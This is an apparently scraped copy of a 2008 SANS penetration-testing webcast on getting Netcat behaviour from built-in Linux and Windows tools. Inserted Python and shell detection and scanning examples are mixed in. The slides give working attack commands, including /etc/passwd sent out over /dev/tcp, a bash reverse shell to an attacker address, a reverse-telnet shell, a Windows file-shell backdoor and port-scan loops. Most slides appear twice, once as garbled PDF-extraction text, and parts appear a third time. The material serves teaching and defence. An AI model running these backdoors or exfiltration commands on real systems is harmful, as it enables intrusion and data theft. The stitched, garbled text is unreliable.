8/14/2019 Penetration Testing Ninjitsu2: Infrastructure and Netcat Without Netcat
https://slidepdf.com/reader/full/penetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1/39
Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 1

Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities
Copyright 2008, SANS
Version 2Q08
By Ed Skoudis

Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A

Building an Infrastructure for Ethical Hacking
• Before starting a test, you need an infrastructure, including:
  – Software
  – Hardware
  – Network infrastructure
• We will discuss some components of a baseline testing infrastructure
  – You will likely tweak or extend it
  – But it is a reasonable starting point
  – We'll focus on software and network stuff

Linux vs. Windows
• Should you concentrate on Linux or Windows? Yes.
• We recommend that your pen test rig include both
  – Virtualized with VMware to rapidly switch between them
• Don't think of them as two different operating systems
  – Think of them as one set of tools you use in your work
  – Not two different toolboxes, but one toolbox with two different compartments
• Is Mac OS X acceptable?
  – It's OK, but you should have virtual Windows and Linux

Software for Testing – Free Test Tools
• Bootable Linux environments can be very helpful
  – Someone has gone through the difficulty of compiling and installing various tools to make everything work
  – One of my favorites is BackTrack, free at http://www.remote-exploit.org/backtrack.html
• Other free sources of tools
  – Milw0rm – www.milw0rm.com
    • Exploits sorted by OS, date, local/remote, etc.
  – Packetstorm Security – http://packetstormsecurity.org
    • Vast history of attack and defense tools

Commercial Tools
• There are numerous useful commercial tools available for pen testers, providing:
  – Typically higher quality and more frequent updates
  – Support – very important for professional testing
• Useful examples include:
  – CORE IMPACT – OS, network services, client-side, and web app exploitation
  – Tenable Security's commercialized Nessus – OS and network services vulnerability scan
  – HP SPI Dynamics' WebInspect – web app vulnerability discovery and exploit

Testing Network Infrastructure - ISP
• For internal testing, a fast connection near a backbone with minimal filtering is ideal
• For Internet-based testing, you will need to send packets through your ISP to the target
  – Scanning – large number of sometimes unusual packets
  – Exploitation
• Some ISPs detect scanning or exploits and then block them
  – Some do this with network-based Intrusion Prevention Systems
  – Can seriously impair your ability to test and the accuracy of your results
• Tell your ISP that you plan to do pen tests and ask if they block

Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A

What is Netcat?
• Netcat: General-purpose TCP and UDP network widget, running on Linux/Unix and Windows
• Takes Standard In and sends it across the network
• Receives data from the network and puts it on Standard Out
• Messages from Netcat itself put on Standard Error
[Diagram: Netcat sits between "The System" and "The Network"; Std In is sent as packets, received packets go to Std Out, and Netcat's own messages go to Std Err]

What Can Netcat Do for Us?
• Send files
• Port scan
• Backdoor shell access
• Connecting to arbitrary open ports
• Vulnerability scanning
• Simple chats
• Replay data in TCP or UDP packets
• Relays, bouncing between systems
• Much, much more...

What Is Netcat Without Netcat?
• Netcat without Netcat involves constructing commands that achieve Netcat behavior...
  – ...without the use of Netcat
• We'll rely on built-in tools only
• Remember those old AT&T commercials?
  – Have you ever kissed your baby goodnight... from a payphone?
  – Have you ever made a command shell backdoor using Linux's /dev/tcp?
  – Have you ever shoveled shell using Linux telnet clients?
  – Have you ever made a port scanner using a Windows FTP client?
  – Have you ever made the Windows file system behave like a command shell?
• YOU WILL

Why Netcat without Netcat?
• For penetration testers:
  – Netcat functionality is very useful in making one system attack another machine
  – But the project's rules of engagement may prohibit installation of additional software, such as Netcat, on compromised targets
  – Some anti-virus tools detect and block Netcat
  – Live off the land: Be a command-line MacGyver
  – Where we're going, we don't need Netcat
[Diagram: Attacker has shell access on a Conquered Target, which is used to scan, analyze and exploit the Next Target]

Useful Netcat Functions
• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows

Linux
• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior

Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener

Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to attacker's waiting Netcat listener, where commands can be entered
[Diagram: the Protected Server, behind a firewall that blocks incoming connections, runs the command above; the attacker runs "nc -l -p [p]" and types commands there, and the commands are executed on the Protected Server]
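A host-side check a defender can run for the reverse shell shape just described, as an added example that is not part of the webcast: a bash started with its three standard streams pointed at /dev/tcp ends up with fd 0, 1 and 2 all resolving to one socket, which /proc exposes without touching the process (Netcat's -e shell leaves the same shape; the reverse-telnet variant below does not, since that shell talks to pipes). The /proc look-alike in build_sample_tree is constructed for demonstration; on a live host call socket_stdio_processes("/proc") and triage the survivors, because inetd-style and socket-activated services legitimately have socket stdio too.

```python
import os
import tempfile


def socket_stdio_processes(proc_root="/proc"):
    """Return (pid, [stdio fds that are sockets], cmdline) for every process
    under proc_root whose fd 0, 1 or 2 resolves to a socket. proc_root is a
    parameter so the same check can run against a constructed tree."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # not a process directory
        pid_dir = os.path.join(proc_root, entry)
        socket_fds = []
        for fd in (0, 1, 2):
            try:
                target = os.readlink(os.path.join(pid_dir, "fd", str(fd)))
            except OSError:
                continue  # fd closed, or another user's process (EACCES)
            if target.startswith("socket:"):
                socket_fds.append(fd)
        if not socket_fds:
            continue
        try:
            with open(os.path.join(pid_dir, "cmdline"), "rb") as f:
                raw = f.read().replace(b"\x00", b" ")
            cmdline = raw.decode("utf-8", "replace").strip()
        except OSError:
            cmdline = ""
        # Triage point: inetd-style and socket-activated services also have
        # socket stdio; an interactive shell (bash -i, sh -i) should not.
        hits.append((int(entry), socket_fds, cmdline))
    return sorted(hits)


def build_sample_tree(root):
    """Constructed /proc look-alike (demonstration data, not a real capture):
    pid 4242 is a bash with all three stdio fds on one socket, the shape left
    by the /dev/tcp one-liner; pid 4300 is an editor on a pty; pid 4400 is a
    daemon with stdio on /dev/null."""
    layout = {
        4242: (["socket:[48211]"] * 3, b"/bin/bash\x00-i\x00"),
        4300: (["/dev/pts/0"] * 3, b"vim\x00notes.txt\x00"),
        4400: (["/dev/null"] * 3, b"/usr/sbin/cron\x00-f\x00"),
    }
    for pid, (targets, cmdline) in layout.items():
        fd_dir = os.path.join(root, str(pid), "fd")
        os.makedirs(fd_dir)
        for fd, target in enumerate(targets):
            # dangling symlinks are fine; only the link text is inspected
            os.symlink(target, os.path.join(fd_dir, str(fd)))
        with open(os.path.join(root, str(pid), "cmdline"), "wb") as f:
            f.write(cmdline)
    return root


def demo():
    """Run the check over the constructed tree and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return socket_stdio_processes(build_sample_tree(tmp))


if __name__ == "__main__":
    for pid, fds, cmd in demo():
        print(f"pid {pid}: stdio fds {fds} are sockets: {cmd}")
    # On a live host: socket_stdio_processes("/proc")
```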

Linux Command-Line Reverse Shell Backdoor In Action
[Screenshot]

Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not placed on Standard Output or Standard Error
  – The shell prints it inline while setting up the redirection, before the command runs, so the command's own redirections cannot send it to a file
[Screenshot: Port 80 is listening]

Storing Results and Iterating
• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers

Command-Line Port Scanner In Action
[Screenshot]

Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on attacker's machine via port1
• Receive output on attacker's machine on port2
Reverse Telnet Shell in Action

Windows
• Built-in command-line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows

Building Blocks: Windows FOR Loops
• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops... some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work... we won't go through them again here

Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it... When it stops, hit CTRL-] and then type quit to resume
  – Or kill the telnet client every 5 seconds:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking

More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of telnet client
  – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs... No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way

Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify port to connect to on the invocation command line... only connects to TCP port 21
• Solution: But you can specify dest port in an FTP command file
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration

The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly

Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
  C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials...
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
File Transfer in Action

Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard...
• But we can look in the file system
• A FOR loop can spin looking for a command in a file, run the command, and dump output to another file:
  C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block...
  – Other folks are starting to use it, extending the idea
  – Use FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
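The Linux /dev/tcp and reverse-telnet commands and the Windows telnet, FTP and file-shell loops above all leave distinctive process command lines, which is the defender's handle on "living off the land". As an added example that is not part of the webcast, this Python scanner matches those shapes in a command-line audit feed (auditd, Sysmon and EDR exports all record one); the record format and the sample records are constructed for demonstration and include benign look-alikes to show what does not fire.

```python
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    note: str


# One rule per technique in the webcast. Each pattern keys on the shape that
# makes the technique work (pseudo-device plus redirection, the fd juggling,
# the loop driving a client), not on bare keywords, to keep noise down.
RULES = [
    Rule("linux_devtcp_redirect",
         re.compile(r"[<>]\s*/dev/(tcp|udp)/[^/\s]+/(\d+|\$\w+)"),
         "bash /dev/tcp redirection: file transfer or single-port check"),
    Rule("linux_devtcp_reverse_shell",
         re.compile(r"/bin/(ba)?sh\s+-i\b.*>\s*/dev/tcp/\S+\s+0<&1(\s+2>&1)?"),
         "interactive shell with stdin/stdout/stderr wired to /dev/tcp"),
    Rule("linux_devtcp_scan_loop",
         re.compile(r"while\s*\[.*-lt\s*\d+.*\]\s*;\s*do\s+.*>\s*/dev/tcp/[^/\s]+/\$\w+"),
         "while-loop iterating a port variable through /dev/tcp"),
    Rule("linux_reverse_telnet",
         re.compile(r"telnet\s+\S+\s+\d+\s*\|\s*/bin/(ba)?sh\s*\|\s*telnet\s+\S+\s+\d+"),
         "reverse telnet: two telnet clients piped around a shell"),
    Rule("win_telnet_scan_loop",
         re.compile(r"for\s+/L\s+%+\w\s+in\s*\([^)]*\)\s*do\s+telnet\s+\S+\s+%+\w", re.I),
         "FOR /L loop driving telnet.exe across ports"),
    Rule("win_telnet_kill_loop",
         re.compile(r"for\s+/L\s+%+\w\s+in\s*\(\s*1\s*,\s*0\s*,\s*2\s*\).*wmic\s+process\s+where\s+.*telnet\.exe.*delete", re.I),
         "infinite FOR /L loop deleting telnet.exe via wmic (scanner watchdog)"),
    Rule("win_ftp_scan_loop",
         re.compile(r"echo\s+open\s+\S+\s+%+\w\s*>\s*(\S+).*ftp\s+-s:\1", re.I),
         "loop writing 'open host port' into a script and running ftp -s: on it"),
    Rule("win_file_shell",
         re.compile(r"for\s+/F\s+.*in\s*\((\S+)\)\s*do\s+cmd(\.exe)?\s+/c\s+%+\w\s*>>\s*\S+.*del\s+\1", re.I),
         "file shell: FOR /F runs a command file, appends output, deletes the file"),
]
NOTES = {r.name: r.note for r in RULES}


def scan_cmdline(cmdline):
    """Names of every rule matching one recorded command line, in RULES order."""
    return [r.name for r in RULES if r.pattern.search(cmdline)]


def scan_records(records):
    """Flatten {host, user, cmdline} records into one finding per rule hit."""
    findings = []
    for rec in records:
        for name in scan_cmdline(rec["cmdline"]):
            findings.append({"host": rec["host"], "user": rec["user"],
                             "rule": name, "cmdline": rec["cmdline"]})
    return findings


def rule_counts(findings):
    """How often each rule fired; a quick noise check for a new feed."""
    return Counter(f["rule"] for f in findings)


# Constructed sample feed (not real captures): the webcast's commands with the
# placeholders filled in, plus benign lines that share keywords with them.
SAMPLE_RECORDS = [
    {"host": "web01", "user": "www-data",
     "cmdline": "cat /etc/passwd > /dev/tcp/10.0.0.5/4444"},
    {"host": "web01", "user": "www-data",
     "cmdline": "/bin/bash -i > /dev/tcp/10.0.0.5/4444 0<&1 2>&1"},
    {"host": "web01", "user": "www-data",
     "cmdline": "port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/10.0.0.5/$port; "
                "[ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done"},
    {"host": "db02", "user": "postgres",
     "cmdline": "telnet 10.0.0.5 4444 | /bin/bash | telnet 10.0.0.5 5555"},
    {"host": "ws-17", "user": "CORP\\jdoe",
     "cmdline": "for /L %i in (1,1,1024) do telnet 10.0.0.9 %i"},
    {"host": "ws-17", "user": "CORP\\jdoe",
     "cmdline": 'for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1'},
    {"host": "ws-17", "user": "CORP\\jdoe",
     "cmdline": "for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open 10.0.0.9 %i > ftp.txt "
                "& echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt"},
    {"host": "ws-17", "user": "CORP\\jdoe",
     "cmdline": 'for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt '
                '& del commands.txt) & ping -n 2 127.0.0.1'},
    # benign look-alikes: plain redirection, a counting loop, scripted ftp, a telnet session
    {"host": "web01", "user": "root", "cmdline": "cat /var/log/syslog > /tmp/syslog.copy"},
    {"host": "ws-17", "user": "CORP\\jdoe", "cmdline": "for /L %i in (1,1,10) do echo %i"},
    {"host": "ws-17", "user": "CORP\\svc_deploy", "cmdline": "ftp -s:deploy.txt"},
    {"host": "db02", "user": "postgres", "cmdline": "telnet mailhost 25"},
]

if __name__ == "__main__":
    for f in scan_records(SAMPLE_RECORDS):
        print(f"[{f['rule']}] {f['host']} {f['user']}: {f['cmdline'][:72]}")
        print("    " + NOTES[f["rule"]])
```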
The File Shell In Action

Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A

Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals

Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August:
  – June 4-9, Las Vegas, NV: Skoudis
  – June 12-July 22, Home On-Line: Skoudis
  – July 24-29, Wash DC: Skoudis
  – Aug 11-16, Boston: Shackleford
  – Aug 18-23, Minneapolis: Conrad
  – Aug 24-29, Va Beach: Strand
• Go to www.sans.org and look for "560" for details

Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Page 2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 239
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 3
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 439Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 4
Building an Infrastructure for
Ethical Hackingbull Before starting a test you need an
infrastructure including ndash Software
ndash Hardware
ndash Network infrastructure
bull We will discuss some components of abaseline testing infrastructure ndash You will likely tweak or extend it
ndash But it is a reasonable starting point
ndash Wersquoll focus on software and network stuff
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 539Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 5
Linux vs Windowsbull Should you concentrate on Linux or Windows Yes
bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them
bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work
ndash Not two different toolboxes but one toolbox with twodifferent compartments
bull Is Mac OS X acceptable
ndash Itrsquos OK but you should have virtual Windows and Linux
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6
Software for Testing ndash
Free Test Tools
bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work
ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml
bull Other free sources of tools
ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc
ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7
Commercial Toolsbull There are numerous useful commercial tools
available for pen testers providing ndash Typically higher quality and more frequent updates
ndash Support ndash very important for professional testing
bull Useful examples include ndash CORE IMPACT ndash OS network services client-side
and web app exploitation
ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan
ndash HP SPI Dynamicsrsquo WebInspect ndash web app
vulnerability discovery and exploit
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener (nc -l -p [port]) whose Standard Out is redirected into a file
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener (nc -l -p [port]), where commands can be entered
[Diagram: the protected server runs the /bin/bash -i ... /dev/tcp command and connects outbound to the attacker's nc -l -p [port] listener; because the victim initiates the connection, the firewall that blocks incoming connections does not stop it. Commands are typed on the attacker's machine and executed on the protected server.]
Linux Command-Line Reverse Shell Backdoor In Action
[Demo slide; screenshot not reproduced in this text version]
Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not placed on the Standard Output or Standard Error of echo
  – The shell itself prints it while setting up the redirection, before echo ever runs, so a 2> placed after the redirection on the same command does not capture it
  – To silence or capture the message, run the command in a subshell and redirect that subshell's Standard Error: ( echo > /dev/tcp/[IPaddr]/[port] ) 2>/dev/null
• If the redirection succeeds without complaint, the port is listening (in the demo, port 80 is listening)
Storing Results and Iterating
• But it does set the exit status variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers
  – Caveat: a filtered port (the target sends no RST) makes the connect stall until the kernel's TCP connect timeout expires rather than fail immediately; this loop has no per-port timeout of its own
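The loop above has no per-port timeout and leaves bash's own "Connection refused" text on the terminal. The script below is an added example, not part of the original webcast: it wraps the same /dev/tcp redirection with the coreutils timeout command so that open, closed and filtered ports are told apart, accepts a port list such as 22,80,8000-8010, and appends results to a file as the slide does. It assumes bash and coreutils timeout are installed; the host 192.0.2.10, the port list and the two-second timeout are constructed values for illustration.

```shell
#!/bin/sh
# Added example, not from the original webcast: /dev/tcp port checking with a
# connect timeout and stderr suppression.  Assumes bash (for /dev/tcp) and the
# coreutils 'timeout' command are installed.  The functions are POSIX sh, so
# the script runs from sh or bash; only the child that opens the socket needs bash.

# check_port HOST PORT [SECONDS] -> prints "open", "closed" or "filtered"
check_port() {
    host=$1; port=$2; secs=${3:-2}
    # The redirection runs in a child bash so that:
    #  - 'timeout' can kill the child if the connect stalls (filtered port), and
    #  - the child's stderr, where bash prints "Connection refused", is dropped.
    # 'exec 3<>' opens the socket read/write and the child exits 0 on success.
    rc=0
    timeout "$secs" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null || rc=$?
    if [ "$rc" -eq 0 ]; then
        echo open
    elif [ "$rc" -eq 124 ]; then
        echo filtered    # timeout(1) returns 124 when it had to kill the child
    else
        echo closed      # connection refused (or no route, or bash/timeout missing)
    fi
}

# expand_ports "22,80-82,443" -> "22 80 81 82 443"
expand_ports() {
    out=""
    old_ifs=$IFS
    IFS=,
    set -- $1
    IFS=$old_ifs
    for item in "$@"; do
        case $item in
            *-*)
                p=${item%-*}
                hi=${item#*-}
                while [ "$p" -le "$hi" ]; do
                    out="$out $p"
                    p=$((p + 1))
                done ;;
            *)
                out="$out $item" ;;
        esac
    done
    printf '%s\n' "${out# }"
}

# scan_ports HOST PORTSPEC OUTFILE: writes one "host port state" line per port,
# appended as the scan runs so the file can be tailed, as in the slide.
scan_ports() {
    host=$1; outfile=$3
    for p in $(expand_ports "$2"); do
        state=$(check_port "$host" "$p")
        printf '%s %s %s\n' "$host" "$p" "$state" >> "$outfile"
    done
}

# Usage (constructed values; 192.0.2.10 is a documentation-only address):
#   scan_ports 192.0.2.10 "22,80,443,8000-8010" /tmp/ports.txt
```

Because the socket is opened inside a separate bash process, the exit status of timeout is the only thing the caller inspects: 0 means the three-way handshake completed, 124 means the connect was still pending when the timer fired, and anything else means the kernel reported an immediate failure such as a RST.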
Command-Line Port Scanner In Action
[Demo slide; screenshot not reproduced in this text version]
